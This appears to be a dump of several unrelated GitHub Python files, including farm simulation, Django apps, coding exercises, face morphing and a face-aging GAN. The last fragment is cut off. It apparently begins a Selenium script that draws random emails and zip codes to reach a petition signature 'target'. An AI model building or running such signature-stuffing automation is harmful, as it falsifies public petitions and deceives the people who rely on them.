'End:', end_x,end_y )\n x = entrance_x + self.fruit_picked_portion * ( end_x - entrance_x ) \n y = entrance_y + self.fruit_picked_portion * ( end_y - entrance_y )\n \n #Find closest node\n closest_node = self.nodes[ 0 ] \n shortest_distance = math.sqrt( ( closest_node.pos_x - x )**2 + ( closest_node.pos_y - y )**2 ) \n for n in self.nodes: \n #print( 'Looking for a closer node. Current: ', closest_node.pos_x,closest_node.pos_y, 'Wanted: ',x,y, 'n', n.pos_x, n.pos_y)\n new_distance = math.sqrt( ( n.pos_x - x )**2 + ( n.pos_y - y )**2 )\n if new_distance < shortest_distance:\n #print( 'Found a closer node' )\n shortest_distance = new_distance\n closest_node = n\n return closest_node\n\nclass Polytunnel : \n \n def __init__( self, lower_left, length, width, angle = 0, number_of_rows = 6, entrance_side = \"NORTH\", fruit_yield = 1000 ):\n \n self.lower_left = lower_left # (x,y) coordinates of the lower left corner\n\n self.length = length\n self.width = width \n self.angle = angle\n \n self.fruit_yield = fruit_yield \n \n # \n ll_x, ll_y = lower_left \n\n coords = ( ( ll_x, ll_y ), ( ll_x, ll_y + width), ( ll_x + length, ll_y + width ), ( ll_x + length, ll_y ), ( ll_x, ll_y ) )\n p = Polygon( coords )\n self.polygon = rotate( p, self.angle, origin = lower_left, use_radians = True )\n b = self.polygon.boundary.coords\n\n #entrance coordinates\n # NOTE! The whole polytunnel was previously treated as having one entrance.\n # Now, we have an entrance to each row. \n entrance_x = ll_x + length/2\n if entrance_side == \"NORTH\": \n entrance_y = ll_y + width + 1 \n polygon_entry_line_endpoints = ( b[1] , b[2] )\n polygon_end_line_endpoints = ( b[-1] , b[-2] )\n else:\n entrance_y = ll_y -1\n polygon_entry_line_endpoints = ( b[-1] , b[-2] )\n polygon_end_line_endpoints = ( b[1] , b[2] )\n\n e = Point( entrance_x, entrance_y )\n self.entrance_point = rotate( e, self.angle, origin = lower_left, use_radians = True ) \n self.entrance_point_node = None \n\n # Create rows \n self.number_of_rows = number_of_rows \n entry_corner1,entry_corner2 = polygon_entry_line_endpoints\n entry_line_array = numpy.linspace( entry_corner1, entry_corner2, num= 2*self.number_of_rows+1)\n entry_points = entry_line_array[ 1::2 ]\n end_corner1,end_corner2 = polygon_end_line_endpoints\n end_line_array = numpy.linspace( end_corner1, end_corner2, num= 2*self.number_of_rows+1)\n end_points = end_line_array[ 1::2 ] \n \n assert( len( entry_points ) == self.number_of_rows )\n assert( len( end_points ) == self.number_of_rows )\n \n self.list_of_rows = [] \n for r in range( number_of_rows ): \n new_r = PolytunnelRow( self, r )\n new_r.entrance_xy_point = Point( entry_points[r] )\n new_r.end_xy_point = Point( end_points[r] )\n self.list_of_rows.append( new_r )\n\n # Create entrance to each row. \n \n #Arbitrary point is a point in the polytunnel used for testing. \n self.arbitrary_point = None \n self.arbitrary_point_node = None \n \n self.points_in_polytunnel = [ ] # a list of points, used in creating a topological map\n self.points_in_polytunnel_nodes = [ ] # nodes corresponding to the points \n\n self.ll_longitude = None\n self.ll_latitude = None\n self.lr_longitude = None\n self.lr_latitude = None\n\n if self.angle==0:\n self.xmin = ll_x\n self.xmax = ll_x + length\n self.ymin = ll_y\n self.ymax = ll_y + width\n self.mesa_space = mesa.space.ContinuousSpace( self.xmax, self.ymax, False, self.xmin, self.ymin )\n #self.mesa_space = mesa.space.SingleGrid( self.xmax, self.ymax, False, self.xmin, self.ymin )\n else:\n xmin, ymin, xmax, ymax = self.polygon.bounds\n self.xmin = xmin\n self.xmax = ymin\n self.ymin = xmax\n self.ymax = ymax\n \n def position_in_polytunnel_simple( self, position ): \n x, y = position\n if angle!=0:\n raise(\"Object at an angle!\")\n return not( x < self.xmin or x >= self.xmax or y < self.ymin or y >= self.ymax )\n \n def position_in_polytunnel_mesa( self, position ): \n if angle!=0:\n raise(\"Object at an angle!\")\n return not ( self.mesa_space.out_of_bounds( position ) ) \n\n def position_in_polytunnel_geometry( self, position ):\n return self.polygon.contains( Point ( position ) )\n\n def position_in_polytunnel( self, position ):\n return self.position_in_polytunnel_geometry( position )\n\n def get_coordinates_list( self ):\n return list( self.polygon.boundary.coords )\n \n def move_xy( self, move_by_x, move_by_y ): \n old_x, old_y = self.lower_left\n new_x = old_x + move_by_x \n new_y = old_y + move_by_y\n self.lower_left = new_x, new_y\n\n self.polygon = translate( self.polygon, move_by_x, move_by_y )\n self.entrance_point = translate( self.entrance_point, move_by_x, move_by_y ) \n \n for r in self.list_of_rows:\n r.entrance_xy_point = translate( r.entrance_xy_point, move_by_x, move_by_y )\n r.end_xy_point = translate( r.end_xy_point, move_by_x, move_by_y )\n\n def rotate_shapely( self, angle, origin = (0,0), use_radians=True ):\n\n self.angle += angle\n self.polygon = rotate( self.polygon, angle, origin = origin, use_radians = use_radians )\n\n xmin, ymin, xmax, ymax = self.polygon.bounds\n self.xmin = xmin\n self.xmax = ymin\n self.ymin = xmax\n self.ymax = ymax\n\n point = rotate( Point(self.lower_left), angle, origin = origin, use_radians = use_radians )\n self.lower_left = point.x, point.y\n e = rotate( self.entrance_point, angle, origin = origin, use_radians = use_radians )\n self.entrance_point = e \n \n for r in self.list_of_rows:\n r.entrance_xy_point = rotate( r.entrance_xy_point, angle, origin = origin, use_radians = use_radians )\n r.end_xy_point = rotate( r.end_xy_point, angle, origin = origin, use_radians = use_radians )\n\n def add_random_point( self ): \n \n ll_x, ll_y = self.lower_left \n arbitrary_point_x = ll_x + random.randint( 0, math.floor( self.length ) ) \n arbitrary_point_y = ll_y + random.randint( 0, math.floor( self.width ) ) \n # ap = Point( arbitrary_point_x, arbitrary_point_y ) \n # self.arbitrary_point = rotate( ap, self.angle, origin = lower_left, use_radians = True ) \n \n self.points_in_polytunnel.append( ( arbitrary_point_x, arbitrary_point_y ) ) \n","repo_name":"FrankIvankovic/TaskAssigner","sub_path":"pickers_model/strawberry_field/polytunnel.py","file_name":"polytunnel.py","file_ext":"py","file_size_in_byte":9080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4792311911","text":"from django.urls import path, include\nfrom django.conf.urls import url\n\nfrom . import views\napp_name = 'oficina'\nurlpatterns = [\n path('', views.index, name='index'), \n path('register/', views.register, name='register'),\n path('produtos/', views.produtos, name='produtos'),\n path('produtos/new/', views.novo_produto, name='novo_produto'),\n path('produtos/delete/<int:id>/', views.apagar_produto, name='apagar_produto'),\n path('produtos/update/<int:id>/', views.atualizar_produto, name='atualizar_produto'),\n path('produtos/validar/', views.validar_descricao_produto, name='validar_descricao_produto'),\n #####################################\n path('fornecedores/', views.fornecedores, name='fornecedores'),\n path('fornecedores/new', views.novo_fornecedor, name='novo_fornecedor'),\n path('fornecedores/delete/<int:id>/', views.apagar_fornecedor, name='apagar_fornecedor'),\n path('fornecedores/edit/<int:id>/', views.atualizar_fornecedor, name='atualizar_fornecedor'),\n #######################################\n path('clientes/', views.clientes, name='clientes'),\n path('clientes/new', views.novo_cliente, name='novo_cliente'),\n path('clientes/edit/<int:id>/', views.atualizar_cliente, name='atualizar_cliente'),\n path('clientes/delete/<int:id>/', views.apagar_cliente, name='apagar_cliente'),\n #######################################\n path('servicos/', views.servicos, name='servicos'),\n path('servicos/new', views.novo_servico, name='novo_servico'),\n path('servicos/delete/<int:id>/', views.apagar_servico, name='apagar_servico'),\n path('servicos/edit/<int:id>/', views.atualizar_servico, name='atualizar_servico'),\n #######################################\n path('vendas/', views.vendas, name='vendas'),\n path('vendas/detail/<int:orcamento_id>/', views.detail_orcamento, name='detail_orcamento'), \n path('orcamentos/', views.orcamentos, name='orcamentos'),\n path('orcamentos/delete/<int:id>/', views.apagar_orcamento, name='apagar_orcamento'),\n path('orcamentos/edit/<int:id>/', views.atualizar_orcamento, name='atualizar_orcamento'),\n path('vendas/new', views.nova_venda, name='nova_venda'), \n path('vendas/add/item/<int:orcamento_id>/', views.novo_item, name='novo_item'),\n path('vendas/delete/item/<int:orcamento_id>/<int:id>/', views.apagar_item, name='apagar_item'),\n path('vendas/edit/item/<int:orcamento_id>/<int:id>/', views.atualizar_item, name='atualizar_item'),\n path('vendas/finish/<int:orcamento_id>/', views.finalizar_venda, name='finalizar_venda'),\n]\n","repo_name":"hugovinicius145/oficina","sub_path":"oficina/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5699960886","text":"def solution(a, b, g, s, w, t):\n answer = -1\n start = 0\n # 옮겨야 할 금,은 양 => 2 * 10^9 / 한번에 옮길 수 있는 양 => 1 / 걸리는 시간 2 * 10^5 (왕복)\n end = 4 * int(1e9) * int(1e5)\n # 이분탐색으로 최적 시간을 찾는다\n answer = end\n while start <= end:\n mid = (start + end) // 2\n gold, silver, total = 0, 0, 0\n for i in range(len(g)):\n time = t[i]\n round_time = time * 2 # 왕복\n cnt = mid // round_time # 시간 만큼 옮길 수 있는 총 횟수\n # 즉, 운반횟수를 늘릴지 판단(편도이므로 이를 기준삼는다)\n if mid % round_time >= time:\n cnt += 1\n # 보유량과 왕복으로 옮기는 총량 중 최소값\n gold += min(g[i], w[i] * cnt)\n silver += min(s[i], w[i] * cnt)\n total += min(g[i] + s[i], w[i] * cnt) # 총량\n # 총량을 통해서도 옮길 수 있는 광물 총합과 신도시 건설 시 필요한 총합과 안맞을 수 있기 때문에 필요함\n # 각 기준보다 크면 시간을 줄이고\n if gold >= a and silver >= b and total >= a + b:\n end = mid - 1\n answer = min(answer, mid)\n # 작으면 시간을 늘린다.\n else:\n start = mid + 1\n\n return answer\n","repo_name":"wnstj-yang/Algorithm","sub_path":"Programmers/programmers_금과 은 운반하기.py","file_name":"programmers_금과 은 운반하기.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72702515394","text":"import os\nimport uuid\n\nfrom django.conf import settings\nfrom django.contrib.auth.signals import user_logged_out\nfrom django.dispatch import receiver\nfrom django.contrib import messages\nfrom django.contrib.auth.models import AbstractBaseUser, BaseUserManager\nfrom django.db import models\nfrom django.utils.deconstruct import deconstructible\nfrom django.db.models import Q\n\nfrom projects.models import Projects\nfrom api.models import ObjectType\nfrom django.utils.translation import gettext_lazy as _\nfrom geopy.geocoders import Nominatim\nimport re\n\nUSER_TYPE = [\n ('user', \"User\"),\n ('engineer', \"Engineer\"),\n ('government', \"Government\"),\n ('project_admin', \"Project Admin\"),\n ('admin', \"Admin\"),\n]\n\nBASIC_USER_TYPE = [\n ('user', \"User\"),\n ('project_admin', \"Project Admin\")\n]\n\nPROJECT_ADMIN_ADDABLE_USER_TYPE = [\n ('user', \"User\"),\n ('engineer', \"Engineer\"),\n ('project_admin', \"Project Admin\"),\n]\n\n@deconstructible\nclass PathAndRename(object):\n def __init__(self, sub_path):\n self.path = sub_path\n\n def __call__(self, instance, filename):\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid.uuid4().hex, ext)\n return os.path.join(self.path, filename)\n\npath_and_rename = PathAndRename(\"user_images\")\n\n# USER LOGOUT SIGNAL (Shows is_active=False users a special message)\n@receiver(user_logged_out)\ndef post_logout(sender, user, request, **kwargs):\n if user and not user.is_anonymous and not user.active and not settings.TESTING:\n messages.success(request, 'User Account has been Disabled. Please contact ISAC-SIMO Admin.')\n\nclass UserManager(BaseUserManager):\n def create_user(self, email, password=None, user_type='user', is_active=True, full_name=None):\n if not email:\n raise ValueError(_(\"Users must have email address\"))\n if not password:\n raise ValueError(_(\"Users must have password\"))\n else:\n user_obj = self.model(\n email=self.normalize_email(email)\n )\n user_obj.set_password(password) #change password\n user_obj.user_type = user_type\n user_obj.active = is_active\n user_obj.full_name = full_name if full_name else email\n user_obj.save(using = self._db)\n return user_obj\n\n def create_staffuser(self, email, password=None):\n staff_user = self.create_user(\n email,\n password = password,\n user_type = 'user'\n )\n return staff_user\n\n def create_superuser(self, email, password=None):\n super_user = self.create_user(\n email,\n password = password,\n user_type = 'admin'\n )\n return super_user\n\nclass User(AbstractBaseUser):\n email = models.EmailField(_(\"Email\"),max_length=255, unique=True)\n full_name = models.CharField(_(\"Full Name\"), max_length=255, blank=True, null=True)\n active = models.BooleanField(_(\"Active\"),default=True) #can login\n user_type = models.CharField(_(\"User Type\"), max_length=50, choices=USER_TYPE, default='user')\n is_staff = models.BooleanField(_(\"Is Staff\"), default=False)\n timestamp = models.DateTimeField(_(\"Timestamp\"), auto_now_add = True)\n image = models.ImageField(_(\"Image\"), upload_to=path_and_rename, default='user_images/default.png', blank=True)\n projects = models.ManyToManyField('projects.Projects', verbose_name=_(\"Projects\"), blank=True, related_name='users')\n # USER IS LINKED TO PROJECT WITH m2m AND USER CAN UPLOAD IMAGE FOR SPECIFIC PROJECT\n # AND VIEW THE IMAGES EITHER ADDED BY THIS USER -OR- BELONGS TO THIS USERS m2m PROJECTS\n created_by = models.ForeignKey(\"main.User\", related_name='children', verbose_name=_(\"Created By\"),\n on_delete=models.SET_NULL, blank=True, null=True)\n\n USERNAME_FIELD='email'\n REQUIRED_FIELDS = []\n\n objects = UserManager()\n\n def __str__(self):\n str = self.full_name or ''\n if str:\n str = str + ' - '\n\n str = str + (self.email or '(no email)')\n return str\n \n def get_full_name(self):\n return self.full_name\n\n def get_project_list(self):\n if self.visible_projects:\n return \"<br/> \".join(list(map(lambda x: '⮞ '+x.project_name, self.visible_projects)))\n else:\n return \"<br/> \".join(list(map(lambda x: '⮞ '+x.project_name, self.projects.all())))\n \n def get_project_json(self, request):\n projects = []\n project_list = []\n if request and request.user and not request.user.is_anonymous and request.user.id:\n project_list = self.projects.all()\n else:\n project_list = Projects.objects.filter(guest=True)\n\n for project in project_list:\n projects = projects + [{\n 'id': project.id,\n 'project_name': project.project_name,\n 'project_desc': project.project_desc\n }]\n return projects\n\n def get_object_detect_json(self, request):\n objects = []\n url = \"\"\n if request:\n url = request.scheme + '://' + request.META['HTTP_HOST']\n # TODO: probably in future we will not get all() objects below\n # We probably will get request.GET.get('project_id') which will be coming for each project specific mobile app\n # So we need to filter ObjectType with this project e.g. ObjectType.objects.filter(project=project_id).order_by('created_at').all()\n\n object_types = []\n # IF Logged in user return all linked Projects Object types\n if request and request.user and not request.user.is_anonymous and request.user.id:\n projects = Projects.objects.filter(users__id=request.user.id)\n object_types = ObjectType.objects.filter(Q(created_by=request.user) | Q(project__in=projects)).order_by('name').all()\n # If Lat Lng available (e.g. from mobile app) filter by country\n if request.GET.get(\"lat\", None) and request.GET.get(\"lng\", None):\n try:\n geolocator = Nominatim(user_agent=\"ISAC-SIMO-Smart-Location\")\n location = geolocator.reverse([request.GET.get(\"lat\"), request.GET.get(\"lng\")])\n if location:\n country_code = location.raw['address']['country_code'].upper()\n object_types = list(filter(lambda obj: not obj.countries or country_code in (list(map(lambda obj: obj.code, obj.countries))), object_types))\n except Exception as e:\n print(e)\n print(\"Failed to Get Location for: \" + request.GET.get(\"lat\") + \",\" + request.GET.get(\"lng\"))\n # Else if Guest user return object type for projects marked as Guest=True\n else:\n projects = Projects.objects.filter(guest=True)\n object_types = ObjectType.objects.filter(Q(project__in=projects)).order_by('name').all()\n\n for o in object_types:\n image = None\n default_image = True\n if o.image:\n image = url + str(o.image.url)\n default_image =True if \"default.jpg\" in image else False\n\n objects = objects + [{\n 'id': o.id,\n 'name': o.name.title(),\n 'instruction': o.instruction if o.instruction else \"\",\n 'image': image,\n 'default_image': default_image,\n 'countries': list(map(lambda x: x.code, o.countries)),\n 'verified': o.verified,\n 'aspect': [2, 2],\n 'project': o.project.project_name,\n }]\n return objects\n\n def get_hidden_email(self):\n email = self.email\n if(len(email.split('@')[0]) >= 3):\n return email[0:3] + re.sub(r'[^@.]', '*', email)[2:-3] + email[-3:]\n else:\n return re.sub(r'[^@.]', '*', email)[2:-3] + email[-3:]\n\n def has_perm(self, perm, obj=None):\n return True\n\n def has_module_perms(self, app_label):\n return True\n\n @property\n def is_admin(self):\n return self.user_type == 'admin'\n\n @property\n def is_project_admin(self):\n return self.user_type == 'project_admin'\n\n @property\n def is_engineer(self):\n return self.user_type == 'engineer'\n\n @property\n def is_government(self):\n return self.user_type == 'government'\n\n @property\n def is_user(self):\n return self.user_type == 'user'\n\n @property\n def is_active(self):\n return self.active\n","repo_name":"ISAC-SIMO/ISAC-SIMO-Django-Backend","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8588,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"23999250785","text":"'''\r\nОпределить количество различных подстрок с использованием хеш-функции.\r\nДана строка S длиной N, состоящая только из строчных латинских букв.\r\nТребуется найти количество подстрок в этой строке.\r\n'''\r\n\r\nimport hashlib\r\n\r\ndef my_hash(value):\r\n letter=26\r\n index=0\r\n size=10000\r\n\r\n for i,char in enumerate(value):\r\n index+=(ord(char)-ord('a')+1)*letter**i\r\n\r\n hashlib.sha1(value.encode('utf-8')).hexdigest()\r\n\r\n return index%size\r\n\r\ns=\"buddy\"\r\nslog=[]\r\ns_t=set()\r\ni=0\r\ni1=0\r\nlen_s=len(s)\r\n\r\nunder_string=set()\r\nwhile i<=len_s:\r\n i1=0\r\n while i1<=len_s:\r\n s_t.add(my_hash(s[i:i1]))\r\n i1+=1\r\n i += 1\r\n if i<len_s:\r\n s_t.add(my_hash(s[i]))\r\n\r\nprint(f'Количество подстрок {len(s_t)-2} в строке: {s}')\r\n","repo_name":"DomenZero/Tasks_Python_9","sub_path":"les_9_task_1.py","file_name":"les_9_task_1.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23636878321","text":"from string import maketrans\r\n\r\na = 'ejp mysljylc kd kxveddknmc re jsicpdrysi'\r\nb = 'rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd'\r\nc = 'de kr kd eoya kw aej tysr re ujdr lkgc jv'\r\nx = 'our language is impossible to understand'\r\ny = 'there are twenty six factorial possibilities'\r\nz = 'so it is okay if you want to just give up'\r\n\r\nd = {'q':'z', 'z':'q'}\r\nfor i in range(len(a)):\r\n d[a[i]] = x[i]\r\nfor i in range(len(b)):\r\n d[b[i]] = y[i]\r\nfor i in range(len(c)):\r\n d[c[i]] = z[i]\r\n\r\nf = ''\r\nt = ''\r\nfor i in range(26):\r\n f += chr(ord('a')+i)\r\n t += d[f[i]]\r\ntrans = maketrans(f, t)\r\n\r\ninfile = open('a.in', 'r')\r\noutfile = open('a.out', 'w')\r\n \r\nn = int(infile.readline())\r\nfor i in range(n):\r\n s = infile.readline()\r\n outfile.write('Case #{0}: {1}'.format(i+1, s.translate(trans)))\r\ninfile.close()\r\noutfile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_95/928.py","file_name":"928.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10803824317","text":"import numpy as np\nimport cv2\nimport dlib\nfrom scipy.spatial import Delaunay\nimport sys\n\npredictor_model = 'shape_predictor_68_face_landmarks.dat'\n\n\ndef get_points(image):\n \"\"\"\n 用 dlib 获取面部特征点\n \"\"\"\n face_detector = dlib.get_frontal_face_detector()\n face_pose_predictor = dlib.shape_predictor(predictor_model)\n try:\n detected_face = face_detector(image, 1)[0]\n except:\n print('No face detected in image {}'.format(image))\n pose_landmarks = face_pose_predictor(image, detected_face)\n points = []\n for p in pose_landmarks.parts():\n points.append([p.x, p.y])\n\n # 加入四个顶点和四条边的中点\n x = image.shape[1] - 1\n y = image.shape[0] - 1\n points.append([0, 0])\n points.append([x // 2, 0])\n points.append([x, 0])\n points.append([x, y // 2])\n points.append([x, y])\n points.append([x // 2, y])\n points.append([0, y])\n points.append([0, y // 2])\n\n return np.array(points)\n\n\ndef get_triangles(points):\n \"\"\"\n 在特征点上使用 Delaunay 三角剖分\n \"\"\"\n return Delaunay(points).simplices\n\n\ndef affine_transform(input_image, input_triangle, output_triangle, size):\n \"\"\"\n 仿射变换\n \"\"\"\n warp_matrix = cv2.getAffineTransform(\n np.float32(input_triangle), np.float32(output_triangle))\n output_image = cv2.warpAffine(input_image, warp_matrix, (size[0], size[1]), None,\n flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REFLECT_101)\n return output_image\n\n\ndef morph_triangle(img1, img2, img, tri1, tri2, tri, alpha):\n \"\"\"\n 三角形变形,Alpha 混合\n \"\"\"\n # 计算三角形的边界框\n rect1 = cv2.boundingRect(np.float32([tri1]))\n rect2 = cv2.boundingRect(np.float32([tri2]))\n rect = cv2.boundingRect(np.float32([tri]))\n\n tri_rect1 = []\n tri_rect2 = []\n tri_rect_warped = []\n\n for i in range(0, 3):\n tri_rect_warped.append(\n ((tri[i][0] - rect[0]), (tri[i][1] - rect[1])))\n tri_rect1.append(\n ((tri1[i][0] - rect1[0]), (tri1[i][1] - rect1[1])))\n tri_rect2.append(\n ((tri2[i][0] - rect2[0]), (tri2[i][1] - rect2[1])))\n\n # 在边界框内进行仿射变换\n img1_rect = img1[rect1[1]:rect1[1] +\n rect1[3], rect1[0]:rect1[0] + rect1[2]]\n img2_rect = img2[rect2[1]:rect2[1] +\n rect2[3], rect2[0]:rect2[0] + rect2[2]]\n\n size = (rect[2], rect[3])\n warped_img1 = affine_transform(\n img1_rect, tri_rect1, tri_rect_warped, size)\n warped_img2 = affine_transform(\n img2_rect, tri_rect2, tri_rect_warped, size)\n\n # 加权求和\n img_rect = (1.0 - alpha) * warped_img1 + alpha * warped_img2\n\n # 生成蒙版\n mask = np.zeros((rect[3], rect[2], 3), dtype=np.float32)\n cv2.fillConvexPoly(mask, np.int32(tri_rect_warped), (1.0, 1.0, 1.0), 16, 0)\n\n # 应用蒙版\n img[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]] = \\\n img[rect[1]:rect[1] + rect[3], rect[0]:rect[0] +\n rect[2]] * (1 - mask) + img_rect * mask\n\n\ndef morph_faces(filename1, filename2, alpha=0.5):\n \"\"\"\n 融合图片\n \"\"\"\n img1 = cv2.imread(filename1)\n img2 = cv2.imread(filename2)\n\n points1 = get_points(img1)\n points2 = get_points(img2)\n points = (1 - alpha) * np.array(points1) + alpha * np.array(points2)\n\n img1 = np.float32(img1)\n img2 = np.float32(img2)\n img_morphed = np.zeros(img1.shape, dtype=img1.dtype)\n\n triangles = get_triangles(points)\n for i in triangles:\n x = i[0]\n y = i[1]\n z = i[2]\n\n tri1 = [points1[x], points1[y], points1[z]]\n tri2 = [points2[x], points2[y], points2[z]]\n tri = [points[x], points[y], points[z]]\n morph_triangle(img1, img2, img_morphed, tri1, tri2, tri, alpha)\n\n return np.uint8(img_morphed)\n\n\nif __name__ == '__main__':\n filename1 = sys.argv[1]\n filename2 = sys.argv[2]\n try:\n alpha = float(sys.argv[3])\n except:\n alpha = 0.5\n img_morphed = morph_faces(filename1, filename2, alpha)\n output_file = '{}_{}_{}.jpg'.format(\n filename1.split('.')[0], filename2.split('.')[0], alpha)\n cv2.imwrite(output_file, img_morphed)\n","repo_name":"WeiJiHsiao/face_morpher","sub_path":"face_morhper.py","file_name":"face_morhper.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"61"} +{"seq_id":"16393582510","text":"import itertools\nimport os\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.utils import make_grid\n\nfrom dataset import ImagetoImageDataset\nfrom models import Generator, Discriminator\n\n\nclass AgingGAN(pl.LightningModule):\n\n def __init__(self, config):\n super(AgingGAN, self).__init__()\n self.config = config\n self.genA2B = Generator(config['ngf'], n_residual_blocks=config['n_blocks'])\n self.genB2A = Generator(config['ngf'], n_residual_blocks=config['n_blocks'])\n self.disGA = Discriminator(config['ndf'])\n self.disGB = Discriminator(config['ndf'])\n\n # cache for generated images\n self.generated_A = None\n self.generated_B = None\n self.real_A = None\n self.real_B = None\n\n def forward(self, x):\n return self.genA2B(x) #에이징\n # return self.genB2A(x) #디에이징\n\n def training_step(self, batch, batch_idx, optimizer_idx):\n real_A, real_B = batch\n\n if optimizer_idx == 0:\n # Identity loss\n # G_A2B(B) should equal B if real B is fed\n same_B = self.genA2B(real_B)\n # same_B = self.genB2A(real_B)\n loss_identity_B = F.l1_loss(same_B, real_B) * self.config['identity_weight']\n # G_B2A(A) should equal A if real A is fed\n same_A = self.genB2A(real_A)\n # same_A = self.genA2B(real_A)\n loss_identity_A = F.l1_loss(same_A, real_A) * self.config['identity_weight']\n\n # GAN loss\n fake_B = self.genA2B(real_A)\n # fake_B = self.genB2A(real_A)\n pred_fake = self.disGB(fake_B)\n loss_GAN_A2B = F.mse_loss(pred_fake, torch.ones(pred_fake.shape).type_as(pred_fake)) * self.config[\n 'adv_weight']\n\n fake_A = self.genB2A(real_B)\n # fake_A = self.genA2B(real_B)\n pred_fake = self.disGA(fake_A)\n loss_GAN_B2A = F.mse_loss(pred_fake, torch.ones(pred_fake.shape).type_as(pred_fake)) * self.config[\n 'adv_weight']\n\n # Cycle loss\n recovered_A = self.genB2A(fake_B)\n # recovered_A = self.genA2B(fake_B)\n loss_cycle_ABA = F.l1_loss(recovered_A, real_A) * self.config['cycle_weight']\n\n recovered_B = self.genA2B(fake_A)\n # recovered_B = self.genB2A(fake_A)\n loss_cycle_BAB = F.l1_loss(recovered_B, real_B) * self.config['cycle_weight']\n\n # Total loss\n g_loss = loss_identity_A + loss_identity_B + loss_GAN_A2B + loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB\n\n output = {\n 'loss': g_loss,\n 'log': {'Loss/Generator': g_loss}\n }\n self.generated_B = fake_B\n self.generated_A = fake_A\n\n self.real_B = real_B\n self.real_A = real_A\n\n # Log to tb\n if batch_idx % 500 == 0:\n self.logger.experiment.add_image('Real/A', make_grid(self.real_A, normalize=True, scale_each=True),\n self.current_epoch)\n self.logger.experiment.add_image('Real/B', make_grid(self.real_B, normalize=True, scale_each=True),\n self.current_epoch)\n self.logger.experiment.add_image('Generated/A',\n make_grid(self.generated_A, normalize=True, scale_each=True),\n self.current_epoch)\n self.logger.experiment.add_image('Generated/B',\n make_grid(self.generated_B, normalize=True, scale_each=True),\n self.current_epoch)\n return output\n\n if optimizer_idx == 1:\n # Real loss\n pred_real = self.disGA(real_A)\n loss_D_real = F.mse_loss(pred_real, torch.ones(pred_real.shape).type_as(pred_real))\n\n # Fake loss\n fake_A = self.generated_A\n pred_fake = self.disGA(fake_A.detach())\n loss_D_fake = F.mse_loss(pred_fake, torch.zeros(pred_fake.shape).type_as(pred_fake))\n\n # Total loss\n loss_D_A = (loss_D_real + loss_D_fake) * 0.5\n\n # Real loss\n pred_real = self.disGB(real_B)\n loss_D_real = F.mse_loss(pred_real, torch.ones(pred_real.shape).type_as(pred_real))\n\n # Fake loss\n fake_B = self.generated_B\n pred_fake = self.disGB(fake_B.detach())\n loss_D_fake = F.mse_loss(pred_fake, torch.zeros(pred_fake.shape).type_as(pred_fake))\n\n # Total loss\n loss_D_B = (loss_D_real + loss_D_fake) * 0.5\n d_loss = loss_D_A + loss_D_B\n output = {\n 'loss': d_loss,\n 'log': {'Loss/Discriminator': d_loss}\n }\n return output\n\n def configure_optimizers(self):\n g_optim = torch.optim.Adam(itertools.chain(self.genA2B.parameters(), self.genB2A.parameters()),\n lr=self.config['lr'], betas=(0.5, 0.999),\n weight_decay=self.config['weight_decay'])\n d_optim = torch.optim.Adam(itertools.chain(self.disGA.parameters(),\n self.disGB.parameters()),\n lr=self.config['lr'],\n betas=(0.5, 0.999),\n weight_decay=self.config['weight_decay'])\n return [g_optim, d_optim], []\n\n def train_dataloader(self):\n train_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.Resize((self.config['img_size'] + 30, self.config['img_size'] + 30)),\n transforms.RandomCrop(self.config['img_size']),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ])\n dataset = ImagetoImageDataset(self.config['domainA_dir'], self.config['domainB_dir'], train_transform)\n return DataLoader(dataset,\n batch_size=self.config['batch_size'],\n num_workers=self.config['num_workers'],\n shuffle=True)\n\n##########추가한거###################\n # def save_weights(self, path):\n # name = '1.pth'\n # full_path = os.path.join(path, name)\n # torch.save(self.state_dict(), full_path)\n\n def save_weights(self, path):\n generator_state_dict = self.genA2B.state_dict()\n discriminator_state_dict = self.disGB.state_dict()\n state_dict = {\n 'genA2B': generator_state_dict,\n 'disGB': discriminator_state_dict\n }\n torch.save(state_dict, os.path.join('./teamproject-cycle/pretrained_model/state_dict_korea_aging.pth'))\n\n def load_weights(self, path):\n checkpoint = torch.load(os.path.join('./teamproject-cycle/pretrained_model/state_dict_korea_aging.pth'))\n generator_state_dict = checkpoint['genA2B']\n discriminator_state_dict = checkpoint['disGB']\n self.genA2B.load_state_dict(generator_state_dict)\n self.disGB.load_state_dict(discriminator_state_dict)","repo_name":"rlaxoghd0513/study","sub_path":"팀프로젝트/teamproject-cycle/gan_module.py","file_name":"gan_module.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38160478780","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import Select\n\nemail_generator = \"https://www.randomlists.com/email-addresses\"\nlocation_generator = \"https://www.randomlists.com/random-zip-codes\"\n# Jack's 2K Target\n# petition = 